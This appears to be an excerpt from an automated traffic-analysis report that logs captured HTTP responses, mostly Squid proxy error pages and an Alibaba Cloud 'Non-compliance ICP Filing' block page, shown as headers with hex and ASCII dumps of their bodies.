http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 3699X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from hostX-Cache-Lookup: NONE from host:3128Connection: closeData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0 Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:00 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:01 GMTContent-Type: text/html;charset=utf-8Content-Length: 3796X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:03 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
